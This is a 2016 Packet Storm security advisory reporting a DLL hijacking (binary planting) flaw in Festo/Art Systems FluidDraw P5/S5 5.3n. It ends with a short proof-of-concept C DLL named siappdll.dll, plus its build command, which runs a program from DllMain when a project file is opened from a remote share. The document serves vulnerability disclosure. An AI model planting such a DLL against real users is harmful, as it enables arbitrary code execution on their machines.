Art Systems FluidDraw P5/S5 5.3n Binary Planting Arbitrary Code Execution

2016-01-18T00:00:00
ID PACKETSTORM:135307
Type packetstorm
Reporter LiquidWorm
Modified 2016-01-18T00:00:00

Description

                                        
                                            `/*  
  
  
Art Systems FluidDraw P5/S5 5.3n Binary Planting Arbitrary Code Execution  
  
  
Vendor: Art Systems Software GmbH | Festo AG & Co. KG  
Product web page: http://www.art-systems.com | https://www.festo.com  
Affected version: FluidDraw S5 Starter 5.3n (5.3.385.0)  
FluidDraw P5 Professional 5.3n (5.3.385.0)  
  
Summary: Fluiddraw enables the creation of electrical and pneumatic  
circuit diagrams. The tool makes it easier to plan complete systems  
and implement individual components. Users access the Festo catalogue  
and their own imported databases and can thus benefit from evaluation  
functions and created assembly drawings. The software is part of Festo  
Engineering Tools, which provides users with electronic and continuous  
support in the entire process, from planning, selection, design and  
ordering up to delivery and commissioning.  
  
Desc: FluidDraw suffers from a DLL Hijacking issue. The vulnerability  
is caused due to the application loading libraries (siappdll.dll) in  
an insecure manner. This can be exploited to load arbitrary libraries  
by tricking a user into opening a related application files (.PRJ, .CIRC,  
.CT, .DXF, .SYM) located on a remote WebDAV or SMB share.  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Microsoft Windows 7 Professional SP1 (EN)  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5295  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5295.php  
  
  
01.12.2015  
  
*/  
  
  
// gcc -shared -o siappdll.dll exploit.c  
  
#include <windows.h>  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)  
{   
exec();  
return 0;  
}  
  
int exec()  
{  
WinExec( "calc.exe" , SW_NORMAL );  
return 0;  
}  
`